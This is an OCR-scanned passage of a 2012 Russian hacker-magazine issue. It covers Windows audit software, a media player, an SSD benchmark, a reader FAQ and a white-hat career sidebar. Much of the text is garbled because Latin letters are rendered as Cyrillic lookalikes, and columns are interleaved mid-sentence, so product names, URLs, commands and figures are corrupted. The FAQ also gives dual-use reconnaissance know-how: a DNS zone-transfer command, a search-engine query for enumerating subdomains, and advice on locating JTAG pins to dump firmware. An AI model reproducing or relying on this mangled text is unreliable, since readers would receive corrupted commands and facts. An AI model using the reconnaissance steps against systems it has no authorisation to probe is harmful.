оповещение о выполнении задания. Программа сохраняет полную 
историю изменений объектов Ай и ОРО и архив записей. Кроме 
этого, программа позволяет централизованно: 

• сбрасывать па рол и учетных записей и устанавливать пара ме- 
тры, которые должен будет настроить пользователь при входе в 
систему; 

• обнаруживатьи отключать/удалятьустаревшиеучетныезаписи, 
неактивные некоторое время; 

• управлять свойства ми нескольких учетных записей одновре- 
менно при помощи шаблонов (указыватьатрибуты ЕхсЬапде, Т5, 
домашнюю папку, профиль и прочее), импортировать атрибуты, 
искатьобъекты Ай; 

• делегировать настройку пол ьзовательских аккаунтов другим 
пользователям. 

Веб-интерфейс управления не локализован, но понятен даже 
новичку. Окно визуально разбито на четыре части. В самом верху 
находится панель меню, состоящая из семи пунктов: Ноте, 
Рерогіз, Рііе АисШ, Аіегіз, СопПдигаІіоп, Абтіп и БиррогС После 
выбора пункта под ним появляется подменю со специфическими 
установками. В Ноте можно найти информацию по ошибкам входа 
в систему, коды ошибок, статистику по входу в систему, установку/ 
смену пароля и быстрый доступ к некоторым отчетам. 

После установки система содержит более 150 готовых отчетов, 
большинство из них собраны в секции Рерогіз, которая разбита на 




АйАисІіІ РІиз снабжен множеством готовых отчетов, однако откат придется 
производить вручную 



шесть категорий и несколько подкатегорий. Назначение боль- 
шинства понятно из названия. Просто переходим сюда, выбираем 
нужный пункт и смотрим результат. Некоторые колонки скрыты, 
при необходимости их можно активировать. Для упрощения от- 
бора информации используется поиск по колонкам. В Сотрііапсе 
собраны отчеты, соответствующие стандартам безопасности 50Х, 
НІРАА, РСІ-Б55, ЗЕВА и ЕІ5МА. Кроме того, свои отчеты (Рерогі 
Ргоі'ііе ВазесІ РерогЫ может создавать администратор. Единствен- 
ный минус АБАисШ РІиз состоит в том, что в случае возникновения 
проблем администратор о них узнает, но возврат к предыдущим 
значениям необходимо будет произвести самостоятельно штатны- 
ми средствами ОС/приложения. 

Установить АОАисІ И: РІиз можно на компьютер, работающий под 
управлением ѴѴіпсІоѵѵз, начиная отХР (32- и 64-битные версии). 

В качестве СУБД используется М5 БОБ Бегѵег 2к5/2к8/2к8Р2. 
Лицензия зависит от количества обслуживаемых контроллеров до- 
мена. Предлагается три версии: Ргее, БіапсіагсІ и Рго^еззіопаІ (файл 
для закачки один). Бесплатная версия позволяет контролировать 
до 100 объектов в одном домене. 

Кроме АОАисІИ: РІиз, корпорация 2оЬо предлагает инструмент 
сбора и анализа журналов событий ЕѵепіБод Апаіугег, по сво- 
им возможностям приближающийся к 5ІМ (Зесигііу ІпІюгтаЛоп 
Мападетепі). 



СЮЕ5ТСНАМ6ЕАІІ0ІТ0К 



Компания Сіиезі БоЙѵѵаге предлагает свой продукт для аудита 
в реальном времени — СЬапдеАисШог ( диезБсот/сбапдеаисІііог ). 
оперативно отслеживающий изменения настроек Ай, ЕхсЬапде, 
работу с файловым и БОБ-сервером, БЬагеРоіпБ ЮАР-запросы, 
ЕМС, ІМеіАрр и ѴМѵѵаге ѵСепІег. Отчеты позволяют получить точные 
подробности всех изменений и событий: кто, когда и где внес 
изменения, а также исходные и текущие значения, информацию 
об успешной/неудачной регистрации, назначение прав доступа и 
дополнительных привилегий, изменение политик, доменов или 
учетных записей. Также пакет обеспечивает защиту от измене- 



ОТЧЕТЫ МОЖНО ЗАПУСКАТЬ 
ПО РАСПИСАНИЮ, РЕЗУЛЬТАТ 
СОХРАНЯЕТСЯ В ФАЙЛ, А ПО 
Е-МАІЬ ПРИХОДИТ ОПОВЕЩЕНИЕ 
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Постановка на контроль 



АНАЛИЗИРУЕТСЯ ВСЯ 
НЕОБЫЧНАЯ АКТИВНОСТЬ 
ПОЛЬЗОВАТЕЛЕЙ 
И АДМИНИСТРАТОРОВ 

ний в наиболее важных объектах Ай, предотвращая случайное 
удаление 011 и изменение параметров 0Р0. Чтобы было легче на- 
страивать такую защиту, предложены готовые шаблоны и визард. 

В случае изменения критически важных элементов или шаблонов 
администратор сразу же получает оповещение по е-таіі, с по- 
мощью ѴѴМІ или 5ІММР. Анализируется вся необычная активность 
пользователей и администраторов: регистрация в нерабочее 
время, многократная неудачная попытка входа, неавторизованное 
использование заданных по умолчанию паролей администра- 
тора и другое. Возможно настроить определенное действие при 
наступлении событий, например откат изменений к первоначаль- 
ным значениям или отключение подозрительного пользователя. 
Предусмотрена точная настройка режима контроля в соответствии 
с политиками, принятыми в конкретной организации. 

Для удобства отбора события в консоли подсвечиваются 
цветом, показывающим их состояние и степень опасности. Дан- 
ные можно перенаправить другому пользователю, просмотреть 
информацию в базе знаний и вернуть к нужному значению. Чтобы 
избежать перегрузки базы данных, СЬапдеАисІіІог умеет отключать 
аудитучетных записей надежных пользователей. 

После установки в распоряжении системного администратора 
будет более сотни готовых отчетов, в том числе соответствующих 
стандартам безопасности 5А5 70, НІРАА, 6І_ВА, 150 17799, РІ5МА. 
Реализован ролевой доступ, позволяющий администраторам 
определить полномочия другим пользователям, которые самосто- 
ятельно будут формировать отчеты. Интерфейс позволяет отобрать 
события при помощи фильтра или поиска. Для аудита используется 
собственная патентованная технология и собственный журнал со- 
бытий, технология Сіиезі ІпТгизІ позволяет записывать все события 
в системный журнал ѴѴіпсІоѵѵз в реальном времени. Возможно 
долговременное хранение архива журналов без потерь собранной 
информации, что соответствует современным законодательным 
требованиям. 

На удаленных системах устанавливаются агенты, которые от- 
правляют всю информацию на сервер СЬапдеАисМог Соогсііпаіог. 

В установке и настройке запуска режимов контроля активности 
и аудита изменений помогают мастеры, при помощи которыхуста- 
навливается выбор контролируемых параметров и задание правил, 
политик и задач. Возможна интеграция с М5 Зузіетз Сепіег 
Орегаііоп Мападег и другими решениями Оііезі ЗоКѵѵаге. Напри- 
мер, Сіиезі ІпТгизІ относится к 5ІМ и позволяет собирать, сохранять 
данные о событиях в ѴѴіпсІоѵѵз и *піх, составляя отчеты и уведомляя 
о наиболее важных. 

Для установки агента понадобится компьютер, работающий под 
х86/х64 ѴѴіпсІоѵѵз отХР 5Р2, Соогбіпаіог работает под управлением 
ѴѴіпсІоѵѵз Зегѵег от 2003 и требует 5СІІ_ Зегѵег от 2к5 5Р2. 



ѴА Р? О N 1 5 0АТА0ѴАЫТА6Е ГОР ѴѴШ0ѴѴ5 



Пользователи меняют должности, увольняются, добавляются 
в группы безопасности и исключаются из них. Учитывая, что 
современная сеть насчитывает большое количество ресурсов, 
доступ к которым настраивается вручную несколькими ад- 
министраторами, часто сложно определить, кто и куда имеет 
право зайти. Эту проблему может решить Ѵагопіз йаіАсІѵапІаде 
( ѵагопіз.сот ) — продукт несколько иного класса. Его назначе- 
ние — управление неструктурированными данными (ипзігисіигесі 



сіаіа) компании и консолидация информации об учетных данных 
и событиях доступа, получаемой из Ай и файловых серверов. 
Механизмы анализа позволяют построить подробную картину, 
демонстрирующую взаимосвязь пользователей, групп и данных, 
включая права доступа и их происхождение, и дать рекомендации 
по назначению прав доступа, соответствующих бизнес-логике 
организации. На основании отчетов администратор может про- 
верить, какие права доступа являются правомерными, а какие 
следует ограничить. После проверки выданной информации 
можно применить рекомендуемые изменения нажатием одной 
клавиши. Программа сохраняет и выводит все попытки доступа 
к данным, с детализацией до отдельного файла, из которой можно 
узнать, как часто он использовался и тип операции (открытие, 
удаление, переименование, изменение прав и так далее). Система 
отчетов позволяет выбрать информацию по любому параметру 
для произвольного периода. Данные затем можно экспортировать 
в файлы (С5Ѵ, ЕхсеІ и другие) для анализа в программах третьих 
фирм. Все настройки производятся в едином интерфейсе. Для 
работы используется компактный агент, генерирующий меньшее 
количество информации по сравнению со штатной системой ауди- 
та ѴѴіпсІоѵѵз. 

Применение Ѵагопіз ОаіАсІѵапІаде рекомендовано на пред- 
приятиях с числом пользователей от 200 или с объемом файло- 
вого сервера от 500 Гб. Предлагается несколько версий Ѵагопіз 
ОаіАсІѵапІаде, ориентированных на аудит ѴѴіпсІоѵѵз, Ай, ЗЬагеРоіпІ, 
ЕхсЬапде и *піх. 



ЗАКЛЮЧЕНИЕ 



Штатная система аудита ѴѴіпсІоѵѵз, при всей своей функционально- 
сти, не лишена недостатков, однако их можно компенсировать при 
помощи продуктов от сторонних разработчиков. Выбор конкретно- 
го — дело каждого, здесь следует исходить из специфики сети и 
требуемой функциональности. □С 



ІШ1 

Особенность систе- 
мы аудита ѴѴіп2к8: 
если при создании 
объектов для 
атрибутов исполь- 
зовались параметры 
по умолчанию, их 
значения в журнал 
не заносятся. 



ЖАРИШС 



Размер журналов 
ѴѴіпсІоѵѵз ограничен 
128 Мб, то есть при 
большом количестве 
событий файл будет 
перезаписан через 
несколько часов. 
Чтобы этого из- 
бежать, необходимо 
в свойствах журнала 
консоли Еѵепі Ѵіеѵѵег 
увеличить размер и 
активировать опцию 
«Архивировать жур- 
нал при заполнении. 
Не перезаписывать 
события». 



шш 

База ЕѵепІШ: 

кЬ.топііогѵѵаге.сот/ 

кЬеѵепШЬ.ІіІтІ . 



Бесплатная версия ЫеІѴѴгіх СГіапде Керогіег позволяет 
получать информацию по всем изменениям за сутки 




ХАКЕР 11 /166/2012 



137 









ГЕККУМ 



Максим Наумов 



А5Ц50ІРЦѴУ 

МЕИАРРО 



ТЕЛЕВИЗОРА 



Медиаплееры ОІРІау в ассорти- 
менте АБІІБ появились уже давно, 
но Месііа Рго — это нечто большее, 
чем просто плеер, это телевизион- 
ная приставка веНор Ьох, спо- 
собная превратить самый старый, 
отставший от жизни телевизор 
в современный Бтагі ТѴ. 



5115 0 ! РІау Месііа Рго собран на базе 
популярного чипа РТ0118500. Впро- 
чем, на этом и заканчивается родство 
с большим количеством медиаплееров, пред- 
ставленных на рынке, поскольку и аппарат- 
ная часть, и софт используются абсолютно 
оригинальные. Сам по себе девайс не велик 
и вполне помещается в кармане, но внутри 
него уместилось больше цифровой начинки, 
чем можно было ожидать. Во-первых, помимо 
имеющейся гигабитной проводной сети, А51І5 
О ! РІау Месііа Рго имеет еще и встроенный ѴѴі-Рі 
802.1 1 п, а во-вторых, внутрь интегрирован 
цифровой тюнер ОѴВ-Т. 

Снаружи удалось разместить немало по- 
лезных интерфейсов: на фасаде слот для карт 
памяти 5Р/ММС и ІІ5В-порт, еще один 115В 
располагается сзади, рядом с АѴ-выходами. 
Для компактности вместо стандартного ЕШМІ 
был применен интерфейс тіпі-НОМІ, однако 
проблем с подключением не возникнет, потому 
что в коробку заботливо вложен соответствую- 
щий кабель. 

Меню у А51І5 0! РІау Месііа Рго полностью 
оригинальное, заметно отличающееся от 
стандартного меню чипсета РеаІІек и по ди- 
зайну, и по наполнению. Если в вашем регионе 
поддерживается цифровое вещание ОѴВ-Т, 
соответствующий раздел меню дает доступ 
к списку каналов, цифрового телевидения и 
радио, а также обеспечивает доступ к элек- 
тронной телепрограмме. 

Для тех, кто обычному телевидению пред- 
почитает интернет-вещание, в интерфейсе 
интегрировано без малого полтора десятка 
полезных виджетов, среди которых ѴоиТиЬе, 
Оаііутоііоп, Рісаза, РІіскг, сервисы ѴаЬоо, а так- 
же удобно структурированные каталоги интер- 
нет-радио и интернет-телевидения, собранные 




на платформе Мигее. Для выхода в онлайн-ки- 
нотеатр АсеТгах и на всеми любимый РасеЬоок 
на пульте ДУ есть специальные кнопки с 
соответствующими логотипами. Обладатели 
современных 5тагГГѴ наверняка уже готовы 
заявить о том, что их телевизоры тоже способны 
работать в ѴоиТиЬе и РасеЬоок — а могутли 
ваши телевизоры выкладывать фото в РасеЬоок 
или заливать видео на ѴоиТиЬе? А А51І5 ОІРІау 
Месііа Рго может! Сделать это не сложнее, чем 
скопировать файл в соседнюю папку. 

С мультиформатностью проблем нет. 

В списке поддерживаемых аудиофайлов 
обнаруживается даже игнорируемый многими 
производителями Іозеіезз-формат АРЕ, и есть 
возможность воспроизводить плей-листы 
формата СІІЕ. В фильмах поддерживаются 
звуковые дорожки йоІЬу ТгиеРЮ, реализована 
поддержка популярного формата МКѴ. Все 
более или менее распространенные видеоко- 
деки, а также контейнеры 150, содержащие 
образы дисков, воспроизводятся стабильно 
и качественно. Еще один повод для зависти 
конкурентов — интеллектуальная функция 
РідЫТхТ, которая самостоятельно ищет и за- 
пускает подходящие субтитры. Такого нет даже 
в Арріе ТѴ! 

При стриминге видео по проводной сети 
и воспроизведении видеофайлов непосред- 
ственно с ІІ5В-носителя без проблем воспро- 
изводится битрейт вплоть до 60 Мбит/с, то есть 
практически любой ЕЮ-видеофайл будет про- 



читан без зависаний картинки. Соответствен- 
но, А51І5 ОІРІау Месііа Рго легко воспроизводит 
файлы с РиІІ ЕЮ видео, записанным с частотой 
кадров 50 и 60 Гц. С беспроводной сетью про- 
изводительность несколько сокращается, что, 
в общем-то, и неудивительно. При желании 
посмотреть ЕЮ по ѴѴі- Рі-сети это можно себе 
позволить, если битрейт не будет превышать 
отметку 25 Мбит/с. 

А вот чему многие конкуренты могут поза- 
видовать, а заодно и поучиться — количеству 
и возможностям дополнительного софта, 
который призван упростить работу с устрой- 
ствами ОІРІау. Для полного взаимопонимания 
и гармонии все дополнительное ПО имеет 
название с приставкой «О!». Так, с помощью 
программы ОЮігесІ, установленной на ПК, 
любой медиафайл на А51І5 ОІРІау Месііа Рго за- 
пускается одним нажатием с помощью ссылки, 
появляющейся в контекстном меню. ЕНа смарт- 
фон или планшет, работающий подуправле- 
нием АпбгоісІ, можно установить программу 
0!Мебіа5Иаге, которая обладает возможностя- 
ми, аналогичными ОЮігесІ, а также выполняет 
функции альтернативного пульта ДУ. 

А51І5 ОІРІау Месііа Рго не просто установил 
более высокую планку качества в своем клас- 
се, но и фактически задал направление для 
развития — обеспечивать бесшовную интегра- 
цию медиаплеера в домашнюю сеть и превра- 
щать все используемые цифровые устройства 
и гаджеты в единое медиапространство. ПЕ 
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ГЕМШМ 



Александр Михеев 



0С2 ѴЕКТЕХ 4 

255АТЗ-2566 ^ МЕНЯТЬ 




ТЕСТОВЫЙ СТЕНД 



Процессор: ІпіеІ Соге І7-3960Х Ехігете Есііііоп, 
ззоо га 3600 МГц 

Материнская плата: А51І5 Р9Х79 РРО 
Оперативная память: Согзаіг СМСТХ7, 1 х 4 Гб, 
ОйРЗ 1333 МГц 

Видеокарта: СЬаіпіесН 6Е240СТ-А1024М1 

Накопитель: С55О-Р120СВ2 120 Гб 

Блок питания: Согзаіг СМР51І-1000НХ, 1000 Вт 

Операционная система: ѴѴіпсІоѵѵз 7 
Максимальная, 64 бит 



ЕЮ 


чж 




Ж 



Форм-фактор: 2,5 дюйма 
Интерфейс: 5АТА3.0 
Тип памяти: МІ_С, ОЫРі 2.2, 25 нм 
Контроллер: іпсііііпх Еѵегезі 2 

Максимальная скорость чтения: 560 Мб/с 
Максимальная скорость записи: 510 Мб/с 
Время наработки на отказ: 2 млн ч 
Объем: 256 Гб 

□ Низкая цена относительно других быстрых 
550 

□ Производительность больше не зависит от 
степени сжатия файлов 

□ Очень высокая скорость случайной записи 
В В тесте РСМагк Ѵапіаде отстает от 0С2 

ѴТХЗ-255АТЗ-240С 




ІОМЕТЕР 

Вапсіот геасі 4 Кб: 24,2 Мб/с 
Вапсіот ѵѵгііе 4 Кб: 80,91 Мб/с 
Бец. геасі 128 Кб: 360,99 Мб/с 
Бец. ѵѵгііе 128 Кб: 41 1,98 Мб/с 
Іотеіег раНегпБ: 
йаІаЬазе: 41,52 Мб/с 
Рііезегѵег: 52,95 Мб/с 
ѴѴогк5ІаІіоп:36,5 Мб/с 
ѴѴеЬзегѵег: 74,47 Мб/с 

РСМАВК ѴАЫТА6Е (НОй) 

Тезі Биііе: 35 923 балла 

ѴѴіпсІоѵѵз Беіепсіег: 171,91 Мб/с 

батіпд: 152,72 Мб/с 

Ітрогііпд рісіигез (о ѴѴіпсІоѵѵз РНоІо 

СаІІегу: 150,16 Мб/с 

ѴѴіпсІоѵѵз ѴІ5Іа зіагіир: 218,83 Мб/с 

Ѵісіео есііііпд иэіпд ѴѴіпсІоѵѵз Моѵіе 

Макет: 175,31 Мб/с 

ѴѴіпсІоѵѵз Месііа Сепіег: 218,5 Мб/с 

Асісііпд тизіс (о ѴѴіпсІоѵѵз Месііа РІауег: 

121,07 Мб/с 

Арріісаііоп Іоасііпд: 153,8 Мб/с 

АКІѴИ/Б 5ТІРА6Е иТІЫТІЕБ 1.0.27 
Бец. геасі/ѵѵгііе (Несжимаемые 
данные): 487,974/41 2,09 Мб/с 
Бец. геасі/ѵѵгііе (Сжимаемые данные): 

488,08/410,26 Мб/с 



оличество 550 разных марок и моде- 
лей на прилавках просто зашкаливает. 
Их не выпускают еще разве что только 
производители жестких дисков, в то время 
как внушительное число фирм другого, порой 
никак не относящегося к твердотельным на- 
копителям профиля давно уже отвоевали себе 
кусочек рынка. Но сегодня мы рассмотрим 
новинку одного из лидеров, чье семейство 550 
под названием Ѵегіех (а точнее, разные его 
поколения) не раз задавало планку произво- 
дительности для своих конкурентов. 

Вкратце напомним, что первое поколение 
ОС 1 Ѵегіех основывалось на контроллерах 
компании іпсііііпх и показывало замечатель- 
ную производительность по меркам того 
времени. ОС 1 Ѵегіех 2 и следующий за ним 
ОС 1 Ѵегіех 3 оснащались уже контроллером от 
І_5І 5апсІРогсе. Отказавшись отуслуг іпсііііпх, 

ОС 1 ТесЬпоІоду вскоре и вовсе приобрела 
эту фирму. Но не просто от избытка денег, 
а для того, чтобы получить независимость 
от 151 5апсІРогсе и сделать в сотрудничестве 




с инженерами іпсііііпх собственный контроллер, 
с блек-джеком и увеличенной производитель- 
ностью при работе с несжимаемыми данными. 

0С2 ѴТХ4-255АТЗ-2566, который мы сегодня 
тестируем, как и вся линейка ОС 1 Ѵегіех 4, ос- 
нован на контроллере собственного производ- 
ства іпсііііпх Еѵегезі 2. Двухуровневая память 
(МІ_С) этих 550 выполнена по 25-нм техпро- 
цессу. Всего новинка представлена четырьмя 
накопителями: на 64, 128, 256 и 512 Гб. 

Чем же все-таки обоснован отказ от про- 
изводительных контроллеров І_5І 5апсІРогсе? 
Во-первых, 550 на собственных контроллерах 
будут обходиться дешевле как самой СО 
ТесЬпоІоду, так и конечному потребителю. 
Во-вторых, іпсііііпх Еѵегезі 2 не имееттаких 
трудностей при работе с несжимаемыми 
данными (архивы, ЗРО, МРЗ и тому подобное), 
какие возникали у 5апсІРогсе 5Р-ХХХХ. Стоит 
взглянуть хотя бы на результаты АпѵіІ'з 5іогаде 
ІДіІіііез 1.0.27. Скорость последовательного 
чтения и записи не назовешь революционной, 
но вот в случайной записи ОС 1 ѴТХ4-255АТЗ- 



2560 показал себя просто превосходно. Наде- 
емся, скорость случайного чтения со временем 
подтянут до такого же уровня, что обеспечит 
молниеносную загрузку ОС и приложений. 



выводы 



Спустя годы удачного сотрудничества с Іпсііііпх 
и 151 5апсІРогсе, ОС Ъ ТесЬпоІоду решилась 
выпустить 4-е поколение семейства Ѵегіех 
на своем собственном накопителе. Среди плю- 
сов мы видим повышение производительности 
в операциях с файлами, не поддающимися 
компрессии, а также в операциях случайной 
записи. Бенчмарки, правда, не показывают 
того значительного превосходства, которое мы 
привыкли видеть с каждым новым поколением 
Ѵегіех. Зато ОС 1 ТесЬпоІоду удалось снизить 
стоимость производства, так что цены на 
новые накопители ниже цен на предыдущее 
поколение. Плюс, благодаря гарантии, можно 
целых пять лет не беспокоиться, что ІЧАІ\Ю- 
память ОС 1 ѴТХ4-255АТЗ-2566 скоропостижно 
исчерпает свой ресурс. □С 
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РАО 



Глеб Чербов (сНегЬоНйдтаіІ.сот) 




ЕСТЬ ВОПРОСЫ — ПРИСЫЛАЙ 
НА РАО(аКЕАІ..ХАКЕР.ІШ 



Допустим, у меня есть ЛА6, как 
тогда к этому чудесному устройству 

ПОДКЛЮЧИТЬСЯ? 

□ Тут все зависит от того, насколько 
производитель позаботился об 
удобстве отладки или же, наоборот, попытал- 
ся максимально затруднить этот процесс. 

В первом случае на плате может даже 
присутствовать специальный разъем для 
подключения ЛАЗ-эмулятора (как правило, 
это два ряда по десять пинов под стандарт- 
ную колодку шлейфа). Если же такового 
отыскать не удалось, остается курить 
даташиты на микроконтроллер и определять, 
какие же из многочисленных ножек, 
торчащих наружу, внутри приводят к 
волшебному интерфейсу. По большому счету 
для полноценной работы нам достаточно 
всего четырех контактов: Т01/Ю0 для ввода/ 
вывода, ТМ5 для управления режимом и ТСК 
для задания частоты. Определив их, можно 
«прозвонить» плату уже на предмет того, 
куда в итоге приводят дорожки, к которым 
припаяны соответствующие контакты 
(подключаться напрямую к процессору не 
всегда удобно). Часто эти окончания, так 
называемые тест-поинты, раскидывают в 
разные места на плате. Поиск точек для 
подключения может быть еще более 
затруднен, если сердце устройства заключе- 
но в ВЗА-корпус (не торчащие в стороны 



ножки, а множество контактов на дне), что 
оставляет для поиска лишь один гуманный 
метод — перебор всех возможных точек-кан- 
дидатов на плате. Вручную это может занять 
необозримо много времени, так что разум- 
ным становится применение специально 
запрограммированного ЛАЗ-ПпсІег'а, 
который подключается сразу ко всем 
подозрительным окончаниям на плате и 
перебирает все возможные комбинации. 
Такой поисковый «паук» как раз реализуется 
проектом для популярной платформы 
Агсішпо — ЛАЗепит ( Ьі1.1ѵ/)Чадепит ) и по 
функциональности ничуть не уступает 
дорогостоящим коммерческим решениям. 

□ Как программно реализовать 

отключение 1)5В-устройства в І_іпих? 

□ Управление практически всей 
доступной периферией в І_іпих 
производится через взаимодействие с 
виртуальной файловой системой зузіъ. 115В 
тут не исключение, и рулить подключенными 
по универсальной последовательной шине 
девайсами можно в полной мере. Заглянув в 
виртуальную директорию /зуз/Ьиз/изЬ/ 
сіеѵісез/, можно заметить, что каждому 
устройству назначен свой каталог, содержа- 
щий различные элементы управления. 

А интересующий нас параметр находится по 
адресу /зуз/Ьиз/изЬ/сІеѵісезЛісІ порта]/[ісІ 




устройства]/роѵѵег/ІеѵеІ. По умолчанию для 
большинства устройств в этом виртуальном 
файле содержится значение «аиіо». Для 
отключения же питания конечного устрой- 
ства необходимо записать туда значение 
«зизрепсі». Подобного рода действия, что 
неудивительно, требуют рутовых привиле- 
гий. В результате сделаем это нехитрой 
манипуляцией: 

зисіо есііо зизрепсі > /зѵз/Ьиз/изЬ/ \ 

сІеѵісез/[ісІ порта]/[ісІ устройства]/ 
роыег/іеѵеі 

Индикатор питания, если таковой имеет- 
ся, должен погаснуть. Для восстановления 
статус-кво достаточно проделать обратное, 
записав значение «аиіо» или «оп». 

□ Как можно получить список имен 
всех поддоменов какого-нибудь 
домена? 

□ Список всех зарегистрированных 
поддоменов может оказаться при 
исследовании сети хорошим подспорьем, 
ведь в именах часто кроется если не вся 
суть, то хотя бы намек на то, что функциони- 
рует по данному адресу. Во многом тут все 
зависит оттого, насколько грамотно был 
сконфигурирован пате-сервер. В частности, 
разрешен ли трансфер доменной зоны. Если 



КАК СТАТЬ ВАЙТХЭТОМ? 



Путь вайтхэта тернист и полон коварных соблазнов, но есть и масса 
способов быть в теме и двигаться вперед, придерживаясь выбранной 
идеологической концепции. Для оттачивания своих навыков и техник 
обнаружения и эксплуатации уязвимостей вовсе не обязательно 
иметь дело с реальными системами. На сегодняшний день существу- 
ет целый ряд способов совершенствоваться как хакеру в изначаль- 
ном и единственно верном смысле этого слова. 



ЗАХВАТЫВАЙ ФЛАГИ! 

Все более набирающий популярность вид 
киберсоревнований, в которых участники 
состязаются во взломе и защите. Регулярно 
проводятся и онлайн, и «очные» СТР-сессии, в 
которых можно участвовать как индивидуально, 
так и в команде. Регистрация на большинство 
из них открыта для всех желающих. 
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ограничений на передачу данных о доменных 
именах нет, то без труда весь список можно 
получить, запросив АХРР-трансфер лично 
себе: 

$ сіі§ (Эпз-зегѵег туз1:егусІотаіп . пеі: ах-Рг 

Если же безопасной настройке было 
уделено должное внимание, такой фокус 
не получится и, увы, придется обходиться 
обратным БЫЗ-поиском при помощи сканера 
птар (весьма затратная по времени про- 
цедура, с негарантированным успехом). Для 
получения списка поддоменов в интернете 
классическим способом является гугл-хак: 

* іпиг1:тѵ5І:егусІотаіп.пе1: 

Или можно вовсе не заморачиваться и 
воспользоваться одним из многочисленных 
специализированных сервисов, например 
зегѵегзпі** ( Ьіі.Іу/зегѵегзпііЛ . 

□ В руки попалось несколько незнако- 
мого мне вида хешей. Подскажите, 
можно ли как-то определить, результатом 
какой функции они являются? 

□ Действительно, разнообразие алгорит- 
мов и форматов хранения хеш-функций 
может поставить в тупик даже человека, 
видавшего хитрые, различной степени 
солености хеш-строки. Всего этого зоопарка 
в голове не удержишь, да и не требуется, 
если всегда можно подсмотреть формат 
получаемого значения в впечатляющем 
списке, составленном специально для этих 
целей специалистами из ІпзісІеРго ( іпзісіерго. 
сот/ЬазЬез.рЬр ). Стоит отметить, что список 
можно с легкостью перегенерировать в 
соответствии с известными параметрами 
(если таковые имеются): хешируемым 
значением, именем пользователя и солью. 
Помимо всевозможных функций представле- 
ны различные экзотические хитросплетения, 
как, например, тб5(зЬа1 (тсІ5($ра55)). 
зЬаІ ($разз)). Впрочем, можно также 
воспользоваться утилитой ЬазЬ-ісІепШіег 
( ЫГІѵ/ИазЫсІ ), которая обладает тоже 




БОЛЬШОЙ ВОПРОС 



Один из множества 
вариантов ЛАС 



в основном производителями самих 
микроконтроллеров, так называемый 
ЛА6-эмулятор — отдельное устройство, 
оперирующее управляющими команда- 
ми и взаимодействующее с компьюте- 
ром. Стоят такие оригинальные игрушки 
для простого энтузиаста, к сожалению, 
заоблачно. К счастью, наши китайские 
друзья уже давно освоили технологию 
и с успехом штампуют полнофункцио- 
нальные реплики, коими завалены 
электронные прилавки с доступными 
ценниками. Есть и ультрабюджетные 
решения, как, например, ѴѴіддІег (не 
что иное, как пять проводков, подклю- 
чаемых к І_РТ-порту плюс специальный 
софт). Из программного обеспечения 
такую отладку в реальном времени под- 
держивает как большинство популярных 
ЮЕдля микроконтроллеров (КеіІ, ІАР), 
так и специализированные пакеты для 
отладки на кристалле в реальном вре- 
мени (Ореп ОСО). 



ПРОЧИТАЛ, ЧТО 
МНОГИЕ УСТРОЙСТВА 
ИМЕЮТ НЕКИЙ ЛА6. 
РАССКАЖИТЕ, ПОЖАЛУЙСТА, 
ПРО ЭТО ПОПОДРОБНЕЕ. 



Большинство современ- 
ных етЬесІсІесІ-устройств 
построены на базе микро- 
контроллеров (АРМ), которые 
действительно имеют специализи- 
рованные интерфейсы для прошив- 
ки или даже отладки. Среди таких 
интерфейсов наиболее распространен 
на сегодняшний день как раз ЭТА6 (Эоіпі: 
Тез* АсЛоп Огоир). Представляет он 
собой некий набор аппаратной логики, 
реализованной прямо в ядре, с помо- 
щью которого можно управлять работой 
процессора на самом низком уровне, 
то есть считывать значения регистров, 
инициализировать и останавливать 
выполнение команд. В свою очередь, 
сам ЛА6 имеет собственный интерфейс 
управления и систему команд, подача 
которых и получение результатов про- 
изводится через специально отведен- 
ные для этих целей контактные группы. 
Проще говоря, у микроконтроллера 
есть несколько «ножек», по-горячему 
подключившись к которым можно кон- 
тролировать его внутреннее состояние, 
а значит, и иметь контроль над всеми 
доступными ресурсами, в том числе и 
флеш-памятью. Имея такой 6СЮ-тосІе 
над устройством, можно, например, 
сдампить код прошивки, который не- 
редко представляет определенный 
интерес с точки зрения дальнейшего 
исследования устройства (далее в ход 
идут дизассемблеры и декомпиляторы). 
Но есть и свои нюансы. В частности, для 
подключения к ЭТА6 потребуется специ- 
альное оборудование, предоставляемое 



ВСТРЕЧАЙ ЕДИНОМЫШЛЕННИКОВ 

Нельзя обойти вниманием и регулярные 
встречи локальных БЕРССИМ-групп: питерской 
БЕРСОЫ #7812 ( сіекоп-гиззіа.ги ) и киевской 
Бе*Соп-ІІА ( сіеісоп.ога.иа ). В их рамках прово- 
дятся семинары и воркшопы именитых про- 
фессионалов и звезд современной хак-сцены, 
а также доклады всех, кто считает, что может 
поведать сообществу что-то интересное, и от- 
крытые дискуссии на актуальные темы. 



УЗНАВАЙ! 

С недавних пор даже в нашей стране про- 
водится несколько ежегодных мероприятий 
международного масштаба, с оглядкой на ле- 
гендарные ВІаск На* и БЕР СОІЧ, посвященные 
разнообразным аспектам информационной 
безопасности и ориентированные на рас- 
пространение знаний в хакерской среде. Это 
2егопідЬ*з ( гегопідЫз.ги ) и Розіііѵе Наск Бауз 
( рМауз.ги ). посещение которых никак нельзя 
будет назвать зря потраченным временем. 



ИССЛЕДУЙ! 

Изучать тематические ресурсы и впитывать 
опыт коллег и единомышленников чрезвы- 
чайно полезно, но, кроме того, очень сильно 
двигают вперед в профессиональном плане 
твои собственные исследования. Распростра- 
ненное мнение, что все уже изучено до нас, 
ошибочно. Я уверен — любое направление, 
любая технология, интересная тебе, являет со- 
бой широчайшую область для исследований. 
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заслуживающим уважения списком распоз- 
наваемых хешей. 



□ 



Как сделать скриншот экрана на устрой- 
стве под управлением АпсІгоісІ 2.x? 



□ Снятие снимка экрана, безусловно, 

очень полезная функция. Без скриншо- 
тов сложно себе представить даже всем 
знакомые странички в Соодіе РІау Магкеі, не 
говоря уже о различных описаниях и 
руководствах. Но к сожалению, штатный 
функционал для этого появился лишь в 
АпсІгоісІ 3.2, в то время как далеко не все 
устройства поддерживают обновление до 
старшей версии. Конечно, получить 
желанную картинку можно, воспользовав- 
шись одним из многочисленных приложений, 
созданных специально для этого, но все они, 
увы, потребуют гооі-доступа, что опять же не 
всегда удобно. Решить эту проблему можно с 
помощью инструмента АпсІгоісІ БеЬид Вгісіде, 
входящего в комплект программ, поставляе- 
мых с АпсІгоісІ 5БК ( Ьіі.іѵ/сігоісізсік ). На 
устройстве необходимо включить разреше- 
ние отладки по 115В (Настройки — > Приложе- 
ния — > Разработка]. При подключении через 
ІІ5В-кабель в системе будет обнаружено 
новое устройство, драйвер для которого 
следует выбрать из директории установки 
АпсІгоісІ 5БК (апбгоісІ-5СІк\ехІга5\доодІе\и5Ь_ 
бгіѵег\). После установки драйвера можно 
